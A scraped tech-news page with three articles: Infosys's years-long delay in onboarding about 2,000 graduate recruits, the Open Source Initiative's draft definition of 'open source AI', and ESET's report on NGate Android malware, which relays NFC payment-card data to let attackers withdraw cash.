A long, weird FOSS circle ends as Microsoft donates Mono to Wine project Read More »

“exploitative” it-firm-has-been-delaying-2,000-recruits’-onboarding-for-years

“Exploitative” IT firm has been delaying 2,000 recruits’ onboarding for years

Jobs —

India’s Infosys recruits reportedly subjected to repeated, unpaid “pre-training.”

Carrot on a stick

Indian IT firm Infosys has been accused of being “exploitative” after allegedly sending job offers to thousands of engineering graduates but still not onboarding any of them after as long as two years. The recent graduates have reportedly been told they must do repeated, unpaid training in order to remain eligible to work at Infosys.

Last week, the Nascent Information Technology Employees Senate (NITES), an Indian advocacy group for IT workers, sent a letter [PDF], shared by The Register, to Mansukh Mandaviya, India’s Minster of Labor and Employment. It requested that the Indian government intervene “to prevent exploitation of young IT graduates by Infosys.” The letter signed by NITES president Harpreet Singh Saluja claimed that NITES received “multiple” complaints from recent engineering graduates “who have been subjected to unprofessional and exploitative practices” from Infosys after being hired for system engineer and digital specialist engineer roles.

According to NITES, Infosys sent these people offer letters as early as April 22, 2022, after engaging in a college recruitment effort from 2022–2023 but never onboarded the graduates. NITES has previously said that “over 2,000 recruits” are affected.

Unpaid “pre-training”

NITES claims the people sent job offers were asked to participate in an unpaid, virtual “pre-training” that took place from July 1, 2024, until July 24, 2024. Infosys’ HR team reportedly told the recent graduates at that time that onboarding plans would be finalized by August 19 or September 2. But things didn’t go as anticipated, NITES’ letter claimed, leaving the would-be hires with “immense frustration, anxiety, and uncertainty.”

The letter reads:

Despite successfully completing the pre-training, the promised results were never communicated, leaving the graduates in limbo for over 20 days. To their shock, instead of receiving their joining dates, these graduates were informed that they needed to retake the pre-training exam offline, once again without any renumeration.

The Register reported today that Infosys recruits were subjected to “multiple unpaid virtual and in-person training sessions and assessments,” citing emails sent to recruits. It also said that recruits were told they would no longer be considered for onboarding if they didn’t attend these sessions, at least one of which is six weeks long, per The Register.

CEO claims recruits will work at Infosys eventually

Following NITES’ letter, Infosys CEO Salil Parekh claimed this week that the graduates would start their jobs but didn’t provide more details about when they would start or why there have been such lengthy delays and repeated training sessions. Speaking to Indian news site Press Trust of India, Parekh said:

Every offer that we have given, that offer will be someone who will join the company. We changed some dates, but beyond that everyone will join Infosys and there is no change in that approach.

Notably, in an earnings call last month [PDF], Infosys CFO Jayesh Sanghrajka said that Infosys Is “looking at hiring 15,000 to 20,000” recent graduates this year, “depending on how we see the growth.” It’s unclear if that figure includes the 2,000 people who NITES is concerned about.

In March, Infosys reported having 317,240 employees, which represented its first decrease in employee count since 2001. Parekh also recently claimed Infosys isn’t expecting layoffs relating to emerging technologies like AI. In its most recent earnings report, Infosys reported a 5.1 percent year-over-year (YoY) increase in profit and a 2.1 percent YoY increase in revenues.

NITES has previously argued that because of the delays, Infosys should offer “full salary payments for the period during which onboarding has been delayed” or, if onboarding isn’t feasible, that Infosys help the recruited people find alternative jobs elsewhere within Infosys.

Infosys accused of hurting Indian economy

NITES’ letter argues that Infosys has already negatively impacted India’s economic growth, stating:

These young engineering graduates are integral to the future of our nation’s IT industry, which plays a pivotal role in our economy. By delaying their careers and subjecting them to unpaid work and repeated assessments, Infosys is not only wasting their valuable time but also undermining the contributions they could be making to India’s growth.

Infosys hasn’t explained why the onboarding of thousands of recruits has taken longer to begin than expected. One potential challenge is logistics. Infosys has also previously delayed onboarding in relation to the COVID-19 pandemic, which hit India particularly hard.

Additionally, India is dealing with a job shortage. Two years is a long time to wait to start a job, but many may have minimal options. A June 2024 study of Indian hiring trends [PDF] reported that IT job hiring in hardware and network declined 9 percent YoY, and hiring in software and software services declined 5 percent YoY. The Indian IT sector saw attrition rates drop from 27 percent in 2022 to 16 to 19 percent last year, per Indian magazine Frontline. This has contributed to there being fewer IT jobs available in the country, including entry-level positions. With people holding onto their jobs, there have also been reduced hiring efforts. Infosys, for example, didn’t do any campus hiring in 2023 or 2024, and neither did India-headquartered Tata Consultancy Services, Frontline noted.

Over the past two years, Infosys has maintained a pool of people to pull from at a time when an IT skills gap in India is expected in the coming years that coincides with a lack of opportunities for recent IT graduates. However, the company risks losing the people it recruited as they might decide to look elsewhere. At the same time, they deal with financial and mental health concerns and make requests for government intervention.

“Exploitative” IT firm has been delaying 2,000 recruits’ onboarding for years Read More »

debate-over-“open-source-ai”-term-brings-new-push-to-formalize-definition

Debate over “open source AI” term brings new push to formalize definition

A man peers over a glass partition, seeking transparency.

Enlarge / A man peers over a glass partition, seeking transparency.

The Open Source Initiative (OSI) recently unveiled its latest draft definition for “open source AI,” aiming to clarify the ambiguous use of the term in the fast-moving field. The move comes as some companies like Meta release trained AI language model weights and code with usage restrictions while using the “open source” label. This has sparked intense debates among free-software advocates about what truly constitutes “open source” in the context of AI.

For instance, Meta’s Llama 3 model, while freely available, doesn’t meet the traditional open source criteria as defined by the OSI for software because it imposes license restrictions on usage due to company size or what type of content is produced with the model. The AI image generator Flux is another “open” model that is not truly open source. Because of this type of ambiguity, we’ve typically described AI models that include code or weights with restrictions or lack accompanying training data with alternative terms like “open-weights” or “source-available.”

To address the issue formally, the OSI—which is well-known for its advocacy for open software standards—has assembled a group of about 70 participants, including researchers, lawyers, policymakers, and activists. Representatives from major tech companies like Meta, Google, and Amazon also joined the effort. The group’s current draft (version 0.0.9) definition of open source AI emphasizes “four fundamental freedoms” reminiscent of those defining free software: giving users of the AI system permission to use it for any purpose without permission, study how it works, modify it for any purpose, and share with or without modifications.

By establishing clear criteria for open source AI, the organization hopes to provide a benchmark against which AI systems can be evaluated. This will likely help developers, researchers, and users make more informed decisions about the AI tools they create, study, or use.

Truly open source AI may also shed light on potential software vulnerabilities of AI systems, since researchers will be able to see how the AI models work behind the scenes. Compare this approach with an opaque system such as OpenAI’s ChatGPT, which is more than just a GPT-4o large language model with a fancy interface—it’s a proprietary system of interlocking models and filters, and its precise architecture is a closely guarded secret.

OSI’s project timeline indicates that a stable version of the “open source AI” definition is expected to be announced in October at the All Things Open 2024 event in Raleigh, North Carolina.

“Permissionless innovation”

In a press release from May, the OSI emphasized the importance of defining what open source AI really means. “AI is different from regular software and forces all stakeholders to review how the Open Source principles apply to this space,” said Stefano Maffulli, executive director of the OSI. “OSI believes that everybody deserves to maintain agency and control of the technology. We also recognize that markets flourish when clear definitions promote transparency, collaboration and permissionless innovation.”

The organization’s most recent draft definition extends beyond just the AI model or its weights, encompassing the entire system and its components.

For an AI system to qualify as open source, it must provide access to what the OSI calls the “preferred form to make modifications.” This includes detailed information about the training data, the full source code used for training and running the system, and the model weights and parameters. All these elements must be available under OSI-approved licenses or terms.

Notably, the draft doesn’t mandate the release of raw training data. Instead, it requires “data information”—detailed metadata about the training data and methods. This includes information on data sources, selection criteria, preprocessing techniques, and other relevant details that would allow a skilled person to re-create a similar system.

The “data information” approach aims to provide transparency and replicability without necessarily disclosing the actual dataset, ostensibly addressing potential privacy or copyright concerns while sticking to open source principles, though that particular point may be up for further debate.

“The most interesting thing about [the definition] is that they’re allowing training data to NOT be released,” said independent AI researcher Simon Willison in a brief Ars interview about the OSI’s proposal. “It’s an eminently pragmatic approach—if they didn’t allow that, there would be hardly any capable ‘open source’ models.”

Debate over “open source AI” term brings new push to formalize definition Read More »

android-malware-steals-payment-card-data-using-previously-unseen-technique

Android malware steals payment card data using previously unseen technique

NEW ATTACK SCENARIO —

Attacker then emulates the card and makes withdrawals or payments from victim’s account.

High angle shot of female hand inserting her bank card into automatic cash machine in the city. Withdrawing money, paying bills, checking account balances and make a bank transfer. Privacy protection, internet and mobile banking security concept

Newly discovered Android malware steals payment card data using an infected device’s NFC reader and relays it to attackers, a novel technique that effectively clones the card so it can be used at ATMs or point-of-sale terminals, security firm ESET said.

ESET researchers have named the malware NGate because it incorporates NFCGate, an open source tool for capturing, analyzing, or altering NFC traffic. Short for Near-Field Communication, NFC is a protocol that allows two devices to wirelessly communicate over short distances.

New Android attack scenario

“This is a new Android attack scenario, and it is the first time we have seen Android malware with this capability being used in the wild,” ESET researcher Lukas Stefanko said in a video demonstrating the discovery. “NGate malware can relay NFC data from a victim’s card through a compromised device to an attacker’s smartphone, which is then able to emulate the card and withdraw money from an ATM.”

Lukas Stefanko—Unmasking NGate.

The malware was installed through traditional phishing scenarios, such as the attacker messaging targets and tricking them into installing NGate from short-lived domains that impersonated the banks or official mobile banking apps available on Google Play. Masquerading as a legitimate app for a target’s bank, NGate prompts the user to enter the banking client ID, date of birth, and the PIN code corresponding to the card. The app goes on to ask the user to turn on NFC and to scan the card.

ESET said it discovered NGate being used against three Czech banks starting in November and identified six separate NGate apps circulating between then and March of this year. Some of the apps used in later months of the campaign came in the form of PWAs, short for Progressive Web Apps, which as reported Thursday can be installed on both Android and iOS devices even when settings (mandatory on iOS) prevent the installation of apps available from non-official sources.

The most likely reason the NGate campaign ended in March, ESET said, was the arrest by Czech police of a 22-year-old they said they caught wearing a mask while withdrawing money from ATMs in Prague. Investigators said the suspect had “devised a new way to con people out of money” using a scheme that sounds identical to the one involving NGate.

Stefanko and fellow ESET researcher Jakub Osmani explained how the attack worked:

The announcement by the Czech police revealed the attack scenario started with the attackers sending SMS messages to potential victims about a tax return, including a link to a phishing website impersonating banks. These links most likely led to malicious PWAs. Once the victim installed the app and inserted their credentials, the attacker gained access to the victim’s account. Then the attacker called the victim, pretending to be a bank employee. The victim was informed that their account had been compromised, likely due to the earlier text message. The attacker was actually telling the truth – the victim’s account was compromised, but this truth then led to another lie.

To “protect” their funds, the victim was requested to change their PIN and verify their banking card using a mobile app – NGate malware. A link to download NGate was sent via SMS. We suspect that within the NGate app, the victims would enter their old PIN to create a new one and place their card at the back of their smartphone to verify or apply the change.

Since the attacker already had access to the compromised account, they could change the withdrawal limits. If the NFC relay method didn’t work, they could simply transfer the funds to another account. However, using NGate makes it easier for the attacker to access the victim’s funds without leaving traces back to the attacker’s own bank account. A diagram of the attack sequence is shown in Figure 6.

NGate attack overview.

Enlarge / NGate attack overview.

ESET

The researchers said NGate or apps similar to it could be used in other scenarios, such as cloning some smart cards used for other purposes. The attack would work by copying the unique ID of the NFC tag, abbreviated as UID.

“During our testing, we successfully relayed the UID from a MIFARE Classic 1K tag, which is typically used for public transport tickets, ID badges, membership or student cards, and similar use cases,” the researchers wrote. “Using NFCGate, it’s possible to perform an NFC relay attack to read an NFC token in one location and, in real time, access premises in a different location by emulating its UID, as shown in Figure 7.”

Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

Enlarge / Figure 7. Android smartphone (right) that read and relayed an external NFC token’s UID to another device (left).

ESET

The cloning could all occur in situations where the attacker has physical access to a card or is able to briefly read a card in unattended purses, wallets, backpacks, or smartphone cases holding cards. To perform and emulate such attacks requires the attacker to have a rooted and customized Android device. Phones that were infected by NGate didn’t have this requirement.

Android malware steals payment card data using previously unseen technique Read More »